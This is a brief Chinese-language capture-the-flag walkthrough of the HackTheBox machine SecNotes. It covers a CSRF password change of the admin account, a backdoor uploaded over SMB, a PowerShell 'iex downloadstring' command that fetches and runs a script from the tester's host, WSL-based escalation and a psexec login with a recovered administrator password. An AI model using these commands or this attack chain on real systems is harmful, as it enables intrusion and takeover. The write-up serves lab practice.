SecNotes - HackTheBox
nmap扫描
访问80
一个登录框
8808端口
iis起始页
先注册一个进80看看
一个添加文章
一个改密码
一个写留言
修改密码不需要原始密码,看看有没有利用可能
修改后会跳转页面
这个应该就是管理员了,给他留言一个http连接试试
nc -nvlp 80
是利用powershell来请求的
看看能不能利用get提交修改密码参数
可以,把这个连接提交给管理员
成功登录管理员账号
这里发现一个疑似smb的路径,先添加域名到hosts文件
smb连接一下
这个应该是8808端口的文件
上传一个后门文件,反弹shell
powershell -c "iex (new-object system.net.webclient).downloadstring('http://10.10.14.17/test.ps1')"
提权
检测脚本检测到靶机安装了wsl,这玩意类似于docker,并且还在里头安装了一个ubuntu操作系统,尝试连接一下wsl容器
可以执行命令,直接反弹一个shell
在当前目录.bash_history中发现administrator的密码
尝试连接smb
在administrator目录下发现root.txt,下载下来
虽然有了flag,但并没有实际的权限,考试中要拥有实际的权限在获取flag
利用psexec.py连接靶机
https://github.com/fortra/impacket/blob/master/examples/psexec.py
python psexec.py administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97